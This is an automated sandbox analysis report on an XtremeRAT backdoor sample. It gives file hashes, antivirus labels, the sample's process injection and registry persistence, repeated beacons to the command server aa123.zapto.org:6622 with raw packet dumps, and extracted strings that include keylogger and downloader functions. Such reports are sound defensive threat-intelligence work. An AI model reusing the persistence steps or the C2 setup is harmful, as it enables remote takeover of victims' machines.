Analysis Date2014-02-01 11:19:28
MD5437af2c37a5e12a218baba4bbd4a2041
SHA1a6048fcd8382f3346df64755567730ecf7e09b6f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 06ac2f3fe83b8d69ff1236b3db4381ec sha1: 30941ef6188472785161c238453043a34c823455 size: 31744
Section.rsrc md5: 2e28036fe3536e928ef08fe55b4e0398 sha1: 8d0265e905cf1c3fbcb2bb02092b1eca99eb94a0 size: 1024
Timestamp1992-06-19 22:22:17
PackerUPX 2.90 (LZMA)
PEhash274a5598a154af320a59c6eff0e011e5d713e611
AVavgCryptic.CWS
AVclamavTrojan.Agent-272886
AVaviraBDS/Backdoor.Gen5
AVmsseBackdoor:Win32/Xtrat.A
AVmcafeeBackDoor-FAJ

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\XtremeRAT\Mutex ➝
siTJx5Lf
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates Processsvchost.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates MutexsiTJx5LfPERSIST
Creates MutexsiTJx5Lf

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\siTJx5Lf\ServerStarted ➝
01/02/2014 09:38:44
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{SG04BNHW-A4XL-56ES-6K8K-3QQ100426L4L}\StubPath ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe restart
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\system32\InstallDir\xtreme.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\siTJx5Lf.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexsiTJx5Lf
Winsock DNSaa123.zapto.org

Process
↳ svchost.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{SG04BNHW-A4XL-56ES-6K8K-3QQ100426L4L}\StubPath ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\xtreme.exe
Creates MutexsiTJx5LfPERSIST
Creates MutexsiTJx5LfEXIT
Creates MutexsiTJx5Lf

Network Details:

DNSaa123.zapto.org
Type: A
188.121.242.73
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1033 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1034 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1035 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1036 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1037 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1038 ➝ 188.121.242.73:6622
Flows TCP192.168.1.1:1039 ➝ 188.121.242.73:6622

Raw Pcap
0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....


Strings
.
+..
$
.
+..
$

DVCLAL
PACKAGEINFO
XTREME
	>_ @(
|0RG. 
1SBSpderA/0"
1Scwp*H"1
2A4+4M
3/7|^Y
3b^sSta
3|;K <
3Messag
3PV#`;4M
4567ao
4!F?4B
`4R3I3ITDh63I3I
%??6$s
789:;<&'()*+,-./12345DKR
80)R|G
"8K<<]`Y
9!0?:KQ
advapi
advapi32.dll
aKLifV
AR7U$u]7!L]CqL
are\Micros
biat+uL2H
BJO8|"G
bll32.d
~$BODQ
BSSvS2
CharNextW
Class_TPUtilW
Configl2
_CRuntime e
Cs>/VL,
 cW$'x
'd*0t^
,	D%4{"
d<88H&
`_{((	da$l$d
<,dBF&,00
\Delphi\RTL
dH.456H
diCwi5g
&dK,0`
dMp'\H
D[#<V5
ed C-p8Xa
EeGI8K
-eeWPseC
EndOf	xum
et3(io
ExitProcess
* F5~\
FPUMaskValuer
FtpPutFileW
Functi
:f)/w"
G0o/MMX?
~$G2$,@r$Gr`|
GetProcAddress
,@Gr$GXd|$Gr$
%(hcD<T
/hh`OX
|*hh}XQ
#iA;Md
$  IN		.
izeofR
J$>CUP#
=jDnLD--
JF{6:$#
KERNEL32.DLL
Keylogg
~KxI[)
LoadLibraryA
L#q-3&}
l<V0D,Z
LzraryAbi
Nak77k
n% c@xt
ntdll.dll
NtUnmapViewOfSection
O7#xTOa
>o. DATA8
OFTWARE\BorlandE
oleaut32.dll
@o&=O8
!OrtDm
'pab:X
Pht,4R1X"
q6q4_!e
/@QbpM
Q#ea+2V
%qO7J5
RegCloseKey
Ri/gdLo
rlenWWrite/MeK
rSz0H97i!r:
r/yVMstM
|} ]`s
s!2CTi
& Setup\In
sGr+M5
SHDeleteKeyW
shell32.dll
SHGetMalloc
shlwapi.dll
s_+nE,
String
%^,<sXuY
SysFreeString
t 1BSd4M
 =tCSc
Term\aHm
TGetPl
This program must be run under Win32
?Thread
TObject
ttp://
+t_$xtZXO
U6AJs<M
u%;ABCDEFgVV
uBFADk
+{u^D$#
Uf<E-Q
URLDownloadToCacheFileW
URLMON.DLL
user32.dll
UTyp$U
vC4sUsYvFk
Virtual5
VirtualAlloc
VirtualFree
VirtualProtect
vQ|ie|eJ~aKf
\VUSXuMT
&Wct1h
WideChar
wininet.dll
wiusK6!c
WVXEGHF@
x4E#tR1W-
XGl89t
XPTPSW
X	r_RY
Xs$ XB
^]XVvI
xWc1t_KV
yAtroy
$Y$ G 
zURLMON.DLL